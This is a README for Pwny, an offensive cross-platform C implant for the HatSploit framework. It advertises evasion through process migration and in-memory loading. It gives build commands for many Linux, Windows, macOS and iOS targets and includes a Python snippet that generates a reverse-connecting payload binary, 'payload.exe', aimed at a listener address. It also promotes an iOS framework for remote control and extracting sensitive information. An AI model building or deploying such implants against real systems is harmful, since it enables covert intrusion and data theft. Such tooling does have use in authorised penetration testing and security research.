Friendly like a Pony, Mighty like a Knight
Pwny is an implementation of an advanced payload written in pure C and designed for portability and extensibility.
This repository contains Pwny, which is supposed to work on macOS, Linux, Windows and iOS, but can be ported to almost every POSIX system. Pwny is optimized to work with or without HatSploit Framework.
- Portable C code that can be compiled for a big range of targets.
- Support for macOS, Linux, Windows and iOS targets.
- Small executable with low resource utilization optimized for embedded systems.
- Dynamically-extendable, supports loading plugins (TABs) which extend its functionality.
- Evasion techniques such as process migration and in-memory loading.
To install Pwny you simply need to install HatSploit Framework, which makes Pwny available automatically.
pip3 install git+https://github.com/EntySec/HatSploit
Building dependencies:
make TARGET=<target>
NOTE: For macOS / iOS targets you are required to set SDK to the desired SDK path before running make. For example:
make TARGET=<target> SDK=<path>
The supported TARGET values for the different platforms are listed below.
Linux
aarch64-linux-musl
armv5l-linux-musleabi
i486-linux-musl
x86_64-linux-musl
powerpc-linux-muslsf
powerpc64le-linux-musl
mips-linux-muslsf
mipsel-linux-muslsf
mips64-linux-musl
s390x-linux-musl
Windows
x86_64-w64-mingw32
macOS / iOS
arm-iphone-darwin
aarch64-iphone-darwin
i386-apple-darwin
x86_64-apple-darwin
aarch64-apple-darwin
Building sources:
cmake -DCMAKE_TOOLCHAIN_FILE=<toolchain> -B build
cmake --build build
NOTE: For macOS / iOS targets you are required to set CMAKE_OSX_SYSROOT to the desired SDK path with -D. For example:
cmake -DCMAKE_TOOLCHAIN_FILE=<toolchain> -DCMAKE_OSX_SYSROOT=<path> -B build
NOTE: Toolchains are located at toolchain/cmake/.
These are the other cmake build options:
- MAIN - Should be ON if you want to build a source file into an executable.
- SOURCE - Custom executable source file (defaults are in src/main/).
- DEBUG - Should be ON if you want to build Pwny in debug mode.
- BUNDLE - Build as a bundle (macOS-specific flag, adds -bundle).
- SHARED - Build a shared object instead.
Quick scripts:
- cross.sh - Install Linux cross-compilers to /etc/cross/.
- build-linux.sh - Build Pwny for all Linux targets and deploy to pwny/templates/.
To use Pwny and build payloads you should import it into your source:
from pwny import Pwny
from pwny.session import PwnySession
- Pwny - Pwny object that is used to generate the payload implant.

pwny = Pwny(
    target='aarch64-apple-darwin',
    options={
        'uri': 'tcp://127.0.0.1:8888'
    }
)

with open('payload.exe', 'wb') as f:
    f.write(pwny.to_binary())
- PwnySession - Wrapper for HatSploitSession for Pwny; HatSploit should use it with the Pwny payload. It might also be used without HatSploit, as demonstrated in examples/listener.py.
- SeaShell Framework - iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information. SeaShell actively uses the Pwny implant to communicate with iOS.
The code provided in this repository has not yet been prepared for use in a production environment. It can be improved, so any contribution is welcome. You may even encounter memory leaks, so we'll be glad to accept every PR that fixes a potential issue.